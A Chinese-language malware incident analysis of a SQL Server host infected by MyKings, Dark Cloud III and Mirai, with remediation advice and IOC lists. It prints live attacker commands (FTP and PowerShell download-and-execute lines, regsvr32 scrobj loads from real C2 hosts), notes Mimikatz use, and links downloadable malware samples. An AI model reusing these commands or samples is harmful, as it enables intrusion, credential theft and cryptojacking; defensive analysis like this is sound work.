暗雲III v3.0 、Mykings、Mirai多個病毒家族結伴來襲的實戰分析

計算機病毒 Windows · 發表 2019-02-10 09:17:33

摘要： MyKings MyKings是一個大規模多重殭屍網路，並安裝門羅幣挖礦機，利用伺服器資源挖礦。概述挖礦攻擊名稱 MyKings 涉及平臺 Windows平臺 ...

MyKings

MyKings是一個大規模多重殭屍網路，並安裝門羅幣挖礦機，利用伺服器資源挖礦。

概述

挖礦攻擊名稱	MyKings
涉及平臺	Windows平臺
相關惡意程式碼家族	DDoS、Proxy、RAT、Mirai
攻擊入口	通過掃描開放埠，利用漏洞和弱口令進行入侵
相關漏洞及編號	永恆之藍
描述簡介	MyKings 是一個由多個子殭屍網路構成的多重殭屍網路，2017 年 4 月底以來，該殭屍網路一直積極地掃描網際網路上 1433 及其他多個埠，並在滲透進入受害者主機後傳播包括 DDoS、Proxy、RAT、Miner 在內的多種不同用途的惡意程式碼。

1.攻擊過程邏輯：

圖-攻擊過程

圖-Payload執行過程

2.病毒各部分功能：

檔名	功能
c.bat	關閉埠
item.dat	遠控木馬主體DLL
J指令碼(硬編碼在Payload中)	結束指定程序,刪除檔案,執行item.dat
cmd批處理指令碼(Payload聯網獲取到記憶體中)	結束指定程序，刪除檔案，刪除指定賬戶執行c.bat 、item.dat

表-各部分功能

排查思路

1.攻擊者利用SQL Server 弱密碼進行暴力入侵方式入侵Windows系統後，會植入木馬下載器conhost.exe(原始檔名ups.exe)，該程式啟動後會首先訪問惡意連結 http://ok.mymyxmra.ru 以獲取第二階段惡意程式碼的下載地址。

根據C:/Windows/System32/b.txt產生的老的連線狀態日誌發現有大量外發掃描1433埠判斷可能是通過SQL Server弱密碼進來的。

C:/Windows/Temp/conhost.exe源始檔名ups.exe：

2.查詢異常程序

3.查詢異常服務

服務名xWinWpdSrv

映像路徑C:/Windows/system/msinfo.exe -s -syn 1000

掃描目標IP地址：生成機制越來越複雜

早期版本中， msinfo.exe用來掃描的目標IP只有兩種：從雲端配置檔案wpd.dat獲取、在本地根據外網出口IP隨機生成；

最新樣本中，增加了一種更復雜的本地隨機生成演算法，並且會避開一批保留地址段。

核心木馬msinfo.exe用到的雲端配置檔案wpd.dat ，是一個加密的XML文件，其中指定了暴破成功後用到來下載Mirai樣本的C2地址、需要掃描的網路服務埠、暴破各個埠所需的口令、入侵各個網路服務時執行的部分命令以及需要掃描的目標IP範圍等配置。這些配置都可以根據後繼殭屍網路的要求靈活更改。

模組化程式設計架構的msinfo.exe：主要是其Crack模組中通過繼承一個基類Task_Crack，實現其中定義好的一組連線、暴破、執行命令等功能的函式介面即可定義一個Task_Crack_XXX子類，繼而實現針對一個新的網路服務的攻擊模組Crack模組與wpd.dat配置檔案中定義的待掃描網路服務埠相對應，可以靈活更改針對不同網路服務的Crack功能。

其他輔助雲端配置檔案：msinfo.exe用到的另外一個輔助木馬ups.exe ，會涉及其它雲端配置檔案。這些也都可以靈活配置，方便攻擊者控制在下一階段需要下載什麼樣本、執行什麼樣的命令。

4.查詢異常計劃任務

名稱	啟動程式	觸發器
my1	c:/windows/system/my1.bat	每天12點執行
Mysa	cmd.exe >/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye	系統啟動執行
Mysa1	rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa	系統啟動執行
Mysa2	cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p	系統啟動執行
ok	rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa	系統啟動執行

載入遠控木馬：

5.查詢異常啟動項

6.查詢異常防火牆和本地安全策略

木馬檔案配置防火牆策略，關閉135、137、138、139、445埠，防止再被其他病毒感染。

7.查詢異常目錄&檔案

C:/Windows/debug目錄，門羅幣挖礦相關的模組和配置檔案：

門羅幣配置config.json

礦池url：”pool.minexmr.com:5555″

錢包地址：

4862mTLmCo9LGqn3XUrV9xaEfzgNPid7AM26XpeWWm4nfEtPfV9Eb1k2xYaYWRyM6LYETJkF3RCqF5JX5dQWEi3hNNE36C6

pass：”x”

C:/Windows/Help目錄：

C:/Windows/system目錄。

msinfo.exe病毒母體通過註冊服務&寫入惡意程式碼到資料庫的手段，實現持久化攻擊，會連線雲端，自動更新病毒，實時下載最新的攻擊模組。

C:/Windows/system32系統命令目錄。

b.txt 埠連線狀態；

a.exe主要功能是實現清除可疑木馬程序和啟動DiskWriter遠控木馬item.dat；

csrse.exe原始檔案ups.exe：

C:/Windows/Temp臨時檔案目錄，被注入的病毒程式碼執行惡意邏輯主要參照從C&C伺服器請求到的配置檔案，該檔案釋放到本地後路徑為：%SystemRoot%\Temp\ntuser.dat。該檔案被異或0×95加密過，在使用該檔案時會對檔案進行解密。

解密後的ntuser.dat配置內容，如下圖所示：

ntuser.dat配置內容總體分為兩個部分：main和update。main部分中的所有ip和網址用來下載後門病毒相關配置，update部分中的ip和網址用來更新ntuser.dat配置資料，請求到的相關配置資訊至今依然在持續更新。下載後門病毒配置資訊cloud.txt的程式碼邏輯。

下載後門病毒配置資訊

請求到的配置資訊中，除後門病毒下載地址（exe鍵名對應資料）外，還有名為url的配置項，該功能開啟後會hook CreateProcessW劫持瀏覽器啟動引數，但現階段該功能尚未被開啟。配置資訊，如下圖所示：

配置資訊

惡意程式碼會通過上圖中的下載地址，將後門病毒下載到%SystemRoot%\Temp\conhost.exe目錄進行執行。下載執行遠端後門病毒相關邏輯。

下載執行後門病毒

Backdoor/Voluminer

該病毒執行後，首先會釋放存放有C&C伺服器列表的檔案（xp.dat）至C:\Program Files\Common Files目錄中，之後向C&C伺服器列表中的伺服器地址請求xpxmr.dat檔案，用於更新C&C伺服器列表。請求到的xpxmr.dat檔案資料使用RSA演算法進行過加密，進行解密後會重新寫入到xpxmr.dat檔案中，該檔案為明文存放。

更新C&C伺服器列表

病毒在執行中會向C&C伺服器請求獲取最新病毒版本號，當檢測到存在新版本時，則會通過C&C伺服器下載執行最新版本的病毒程式。當後門病毒發現當前系統為64位系統時，還會向C&C伺服器請求64位版本的後門病毒到本地進行執行。

請求64位版本病毒

隨後，病毒會使用地址列表中的C&C伺服器地址下載挖礦所需的病毒元件，暫時我們發現會被病毒下載至本地病毒僅具有挖礦功能，但我們不排除其將來會下載其他病毒模組的可能性。病毒在下載檔案後，會對病毒元件進行md5校驗，病毒元件的md5值會參考C&C伺服器中的md5.txt檔案內容。

在該目錄下有個以本機ip命名的txt檔案

內容如下：

--------------------------------------------------------

路徑:C:\Windows\Temp\conhost.exe

命令列:C:\Windows\Temp\conhost.exe

路徑:C:\Windows\SysWOW64\cmd.exe

命令列:cmd /c ""C:\windows\web\c3.bat" "

路徑:C:\Windows\SysWOW64\cacls.exe

命令列:cacls c:\windows\temp\docv8.exe/e /d system

路徑:C:\Windows\system32\csrse.exe

命令列:"C:\Windows\system32\csrse.exe"

路徑:c:\windows\system\msinfo.exe

命令列:c:\windows\system\msinfo.exe -s -syn 1000

路徑:c:\windows\debug\lsmo.exe

命令列:c:\windows\debug\lsmo.exe

路徑:C:\Windows\System32\cmd.exe

命令列:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe & c:\windows\debug\lsmose.exe

路徑:c:\windows\debug\lsmose.exe

命令列:c:\windows\debug\lsmose.exe

路徑:C:\Windows\system32\cmd.exe

命令列:cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' http://wmi.1217bye.host:8888/S.ps1 ')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' http://173.208.139.170/s.txt ')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' http://35.182.171.137/s.jpg ')||regsvr32 /u /s /i: http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i: http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i: http://35.182.171.137/3.txt scrobj.dll

路徑:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

命令列:powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' http://173.208.139.170/s.txt ')

--------------------------------------------

備註

載入遠控木馬，64base編碼解碼後得到：

$ w c = N e w - O b j e c tS y s t e m . N e t . W e b C l i e n t ; $ w c . D o w n l o a d S t r i n g ( " h t t p : / / w m i . 1 2 1 7 b y e . h o s t : 8 8 8 8 / 2 . t x t " ) . t r i m ( )- s p l i t" [ \ r\ n ] + " | % { $ n = $ _ . s p l i t ( " / " ) [ - 1 ] ; $ w c . D o w n l o a d F i l e ( $ _ ,$ n ) ; s t a r t$ n ; }

利用regsvr32執行遠端指令碼命令 /u /s /i: http://wmi.1217bye.host:8888/1.txt scrobj.dll 該txt檔案為一個遠端js指令碼，js腳本里的字元都被用16進位制進行替換，解密後的js指令碼，其主要功能是下載木馬檔案並執行。

解密後的遠端指令碼，Upsnew2釋放遠控木馬item.dat以及c3.bat指令碼。

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV6W313X

ie臨時檔案目錄下upsnew2[1].exe，原始檔名ups.exe：

txt最下面是用mimikatz獲得的系統明文密碼：

下載Invoke-Mimikatz.ps1指令碼：

要結束的程序列表：

C:/Windows/Web目錄：

c3.bat指令碼功能如下：

C:\Program Files\Common Files目錄下：

C:/Program Files/目錄下：

C:/Windows/SysWOW64目錄下，wpd.dat掃描的目標IP從雲端配置檔案：

C:/Windows/taidbox/mbrbackup.bin，暗雲III v3.0：

暗雲III v3.0其執行緒回撥例程執行流程如下：

a)呼叫RtlInitUnicodeString初始化csrss.exe；

b)查詢程序csrss.exe,檢測到csrss.exe後則繼續下一步；

c)感染MBR，並保護1到62扇區的資料，如果試圖讀前62扇區的資料則會返回正常的資料，如果試圖寫前62扇區的資料則返回寫入的資料進行欺騙，實際沒有被寫入；

d)呼叫CreateSystemThread建立系統執行緒,該執行緒函式主要完成了shellcode下載執行等功能,可拉取任意功能惡意程式碼進行執行。

解決方案

1.隔離感染主機：已中毒計算機儘快隔離，關閉所有網路連線，禁用網絡卡；

2.切斷傳播途徑：從殭屍網路當前的攻擊重點來看，防範其通過1433埠入侵計算機是非常有必要的。此外，Bot程式還有多種攻擊方式尚未使用，這些攻擊方式可能在未來的某一天被開啟，因此也需要防範可能發生的攻擊；

3.查詢攻擊源：加固SQL Server伺服器，修補伺服器安全漏洞。使用安全的密碼策略，使用高強度密碼，切勿使用弱口令，防止黑客暴力破解，禁用sa賬號；

4.查殺病毒：使用管家急救箱進行查殺，下載網址：

http://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/SystemAidBoxPro.zip ；

5.修補漏洞：特別注意445埠的開放情況，如果不需要使用Windows區域網共享服務，可以通過設定防火牆規則來關閉445等埠，並及時打上永恆之藍MS17-010等漏洞相關補丁；

6.注意MSSQL，RDP，Telnet等服務的弱口令問題；

7.注意系統賬戶情況，禁用不必要的賬戶。

參考

1.具備多病毒功能！MiraiXMiner物聯網殭屍網路攻擊來襲

https://www.freebuf.com/articles/terminal/191303.html

2.惡意挖礦攻擊的現狀、檢測及處置

https://www.freebuf.com/articles/system/189454.html

3.MyKings：一個大規模多重殭屍網路

https://www.freebuf.com/articles/network/161286.html

4.【木馬分析】悄然崛起的挖礦機殭屍網路：打伺服器挖價值百萬門羅幣

https://www.anquanke.com/post/id/86751

5.MyKings殭屍網路最新變種突襲，攻擊程式碼多次加密混淆，難以檢測

https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw

6.弱口令爆破SQL Server伺服器暗雲、Mykings、Mirai多個病毒家族結伴來襲

https://www.freebuf.com/column/193260.html

7.暗雲系列Bootkit木馬最新動態

https://www.freebuf.com/column/187489.html

8.MyKing黑產團伙最新挖礦活動曝光

https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936

9.中國黑客利用“永恆之藍”搜刮肉雞構建殭屍網路

www.sohu.com/a/144223631_765820

10.殭屍網路“Mykings”

www.voidcn.com/article/p-xdbozctv-brp.html

11.“隱匿者”病毒團伙技術升級傳播病毒暴力入侵電腦威脅全網使用者

https://www.secpulse.com/archives/75273.html

12.徹底曝光黑客組織“隱匿者”：目前作惡最多的網路攻擊團伙

www.4hou.com/info/news/6838.html

13.程式碼戰爭的主陣地——來自終端的威脅情報詳述.pdf

www.studylead.com/p-7400580.html

14.【木馬分析】分析利用“永恆之藍”漏洞傳播的RAT

https://www.anquanke.com/post/id/86822

域名

127.0.0.1ftp.ftp0930.host
127.0.0.1pool.minexmr.com
127.0.0.1raw.githubusercontent.com
127.0.0.1wmi.1217bye.host
127.0.0.1down.mysking.info
127.0.0.1js.ftp0930.host
127.0.0.1js.mykings.top
127.0.0.1ftp.ftp0118.info127.0.0.1ok.mymyxmra.ru 

127.0.0.1mbr.kill0604.ru

ip

173.208.139.17035.182.171.137 
45.58.135.106 

103.213.246.23
78.142.29.152
74.222.14.61
18.218.14.96
223.25.247.240
223.25.247.152
103.95.28.5423.88.160.137 
81.177.135.35 

78.142.29.110174.128.239.250 

66.117.6.174

暗雲III v3.0 、Mykings、Mirai木馬樣本已放到網盤供學習。

連結： https://pan.baidu.com/s/14Hqb3IrjvAqykJSsgKk5Rw

提取碼：3uoq

*本文作者：xuchen16，轉載請註明來自FreeBuf.COM